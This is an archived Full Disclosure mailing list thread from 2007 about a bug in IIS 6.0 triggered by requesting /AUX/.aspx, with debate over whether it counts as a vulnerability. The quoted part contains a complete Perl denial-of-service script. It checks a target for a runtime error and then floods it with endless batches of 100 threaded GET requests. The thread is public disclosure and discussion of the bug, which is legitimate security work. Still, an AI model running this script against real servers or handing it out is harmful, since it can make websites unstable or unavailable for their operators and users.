Full Disclosure mailing list archives
Re: Question Regarding IIS 6.0 / Is this a DoS???
From: "kingcope" <kingcope () gmx net>
Date: Wed, 23 May 2007 11:42:17 +0200
BTW, Here is a screenshot of the effect. -----Original Message----- From: 3APA3A [mailto:3APA3A () SECURITY NNOV RU] Sent: Wednesday, May 23, 2007 10:41 AM To: kingcope Cc: Full-Disclosure; bugtraq () securityfocus com Subject: Re: [Full-disclosure] Question Regarding IIS 6.0 / Is this a DoS??? Dear kingcope, It's vulnerability regardless of DoS impact, because it allows attacker to access special DOS devices (COM1 in this case). E.g. it could be used to read data from device attached to COM1 or prevent another application
from accessing this port (or LPT), because access to ports is exclusive.
--Tuesday, May 22, 2007, 9:10:08 AM, you wrote to full-disclosure () lists grok org uk: k> Hello List, k> Recently I saw a small bug in IIS 6.0 when requesting a special path. k> When I request /AUX/.aspx the server takes a bit longer to respond as k> Normally. So I did write an automated script to see what happens if k> I request this file several times at once. The result is that some servers k> On the internet get quite instable, some do not. On some servers after I k> Stop the attack I get an exception that the Server is too busy/Unhandled k> Exception on the wwwroot (/) path. k> Can you/the list confirm that? k> Here is a lame testing script for this stuff: k> #When sending multiple parallel GET requests to a IIS 6.0 server requesting k> #/AUX/.aspx the server gets instable and non responsive. This happens only k> #to servers which respond a runtime error (System.Web.HttpException) k> #and take two or more seconds to respond to the /AUX/.aspx GET request. k> # k> # k> #signed, k> #Kingcope kingcope () gmx net k> ########################################################################## k> ###*********************************************************************** k> ### k> ### k> ### k> ### Lame Internet Information Server 6.0 Denial Of Service (nonpermanent) k> ### by Kingcope, May/2007 k> ### Better run this from a Linux system k> ########################################################################## k> use IO::Socket; k> use threads; k> if ($ARGV[0] eq "") { exit; } k> my $host = $ARGV[0]; k> $|=1; k> sub sendit { k> $sock = IO::Socket::INET->new(PeerAddr => $host, k> PeerPort => 'http(80)', k> Proto => 'tcp'); k> print $sock "GET /AUX/.aspx HTTP/1.1\r\nHost: k> $host\r\nConnection:close\r\n\r\n"; k> } k> $sock = IO::Socket::INET->new(PeerAddr => $host, k> PeerPort => 'http(80)', k> Proto => 'tcp'); k> print $sock "GET /AUX/.aspx HTTP/1.1\r\nHost: k> $host\r\nConnection:close\r\n\r\n"; k> $k=0; k> while (<$sock>) { k> if (($_ =~ /Runtime\sError/) || ($_ =~ /HttpException/)) { k> $k=1; k> last; k> } k> } k> if ($k==0) { k> print "Server does not seem vulnerable to this attack.\n"; k> exit; k> } k> print "ATTACK!\n"; k> while(1){ k> for (my $i=0;$i<=100;$i++) { k> $thr = threads->new(\&sendit); k> print "\r\r\r$i/100 "; k> } k> foreach $thr (threads->list) { k> $thr->join; k> } k> } k> _______________________________________________ k> Full-Disclosure - We believe in it. k> Charter: http://lists.grok.org.uk/full-disclosure-charter.html k> Hosted and sponsored by Secunia - http://secunia.com/ -- ~/ZARAZA http://securityvulns.com/ Ибо факты есть факты, и изложены они лишь для того, чтобы их поняли и в них поверили. (Твен)
_______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Current thread:
- Question Regarding IIS 6.0 / Is this a DoS??? kingcope (May 21)
- Re: Question Regarding IIS 6.0 / Is this a DoS??? Stan Bubrouski (May 22)
- Re: Question Regarding IIS 6.0 / Is this a DoS??? kingcope (May 22)
- Re: Question Regarding IIS 6.0 / Is this a DoS??? 3APA3A (May 23)
- Re: Question Regarding IIS 6.0 / Is this a DoS??? kingcope (May 23)
- Re: Question Regarding IIS 6.0 / Is this a DoS??? Michael Silk (May 23)
- Re: Question Regarding IIS 6.0 / Is this a DoS??? Richard Moore (May 23)
- Re: Question Regarding IIS 6.0 / Is this a DoS??? 3APA3A (May 23)
- Re: Question Regarding IIS 6.0 / Is this a DoS??? kingcope (May 23)
- Re: Question Regarding IIS 6.0 / Is this a DoS??? kingcope (May 23)
- Re: Question Regarding IIS 6.0 / Is this a DoS??? Stan Bubrouski (May 22)
- <Possible follow-ups>
- Re: Question Regarding IIS 6.0 / Is this a DoS??? 3APA3A (May 23)
- Re: Question Regarding IIS 6.0 / Is this a DoS??? kingcope (May 23)